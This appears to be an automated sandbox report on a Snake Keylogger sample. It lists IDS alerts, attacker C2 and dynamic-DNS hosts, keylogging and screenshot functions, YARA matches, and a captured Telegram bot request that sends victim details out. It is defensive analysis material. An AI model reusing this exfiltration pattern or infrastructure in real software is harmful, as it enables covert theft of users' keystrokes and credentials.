Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49712 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49708 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49715 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49725 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49706 -> 188.114.96.3:443

Source: global traffic

TCP traffic: 192.168.2.7:49727 -> 217.12.218.219:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49705 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.jhxkgroup.online

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 11:44:23 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crt0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3718826716.00000000013E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab;
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bba7b30f77af5
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabH
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bba7b30f77
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0Q
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1268385420.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.000000000325B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Memory allocated: 75DE0000 page read and write			Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Memory allocated: 77DA0000 page read and write			Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 0_2_0308DE4C	0_2_0308DE4C
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 0_2_0AB106A8	0_2_0AB106A8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 0_2_0AB132C8	0_2_0AB132C8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 0_2_0AB10698	0_2_0AB10698
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_0168C146	6_2_0168C146
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_01687118	6_2_01687118
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_0168A088	6_2_0168A088
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_01685362	6_2_01685362
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_0168D278	6_2_0168D278
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_0168C468	6_2_0168C468
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_0168C738	6_2_0168C738
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_016869A0	6_2_016869A0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_0168E988	6_2_0168E988
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_0168CA08	6_2_0168CA08
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_0168CCD8	6_2_0168CCD8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_0168CFAB	6_2_0168CFAB
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_01683E09	6_2_01683E09
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_0168F631	6_2_0168F631
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_0168E97B	6_2_0168E97B
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_01683AB1	6_2_01683AB1
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_0168FA88	6_2_0168FA88
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF1E80	6_2_06DF1E80
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF17A0	6_2_06DF17A0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF0B30	6_2_06DF0B30
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF9C70	6_2_06DF9C70
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF5028	6_2_06DF5028
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF9548	6_2_06DF9548
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF2968	6_2_06DF2968
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFEAF8	6_2_06DFEAF8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFE6B0	6_2_06DFE6B0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFE6AF	6_2_06DFE6AF
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFE258	6_2_06DFE258
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFE249	6_2_06DFE249
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF1E77	6_2_06DF1E77
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFDE00	6_2_06DFDE00
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF1793	6_2_06DF1793
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF8B93	6_2_06DF8B93
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFF3B8	6_2_06DFF3B8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF8BA0	6_2_06DF8BA0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFEF51	6_2_06DFEF51
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFEF60	6_2_06DFEF60
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFEB08	6_2_06DFEB08
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF0B20	6_2_06DF0B20
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFD0F8	6_2_06DFD0F8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFCCA0	6_2_06DFCCA0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF0040	6_2_06DF0040
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF9C6D	6_2_06DF9C6D
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFFC68	6_2_06DFFC68
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF501F	6_2_06DF501F
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFF810	6_2_06DFF810
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF0007	6_2_06DF0007
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFF801	6_2_06DFF801
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFDDFF	6_2_06DFDDFF
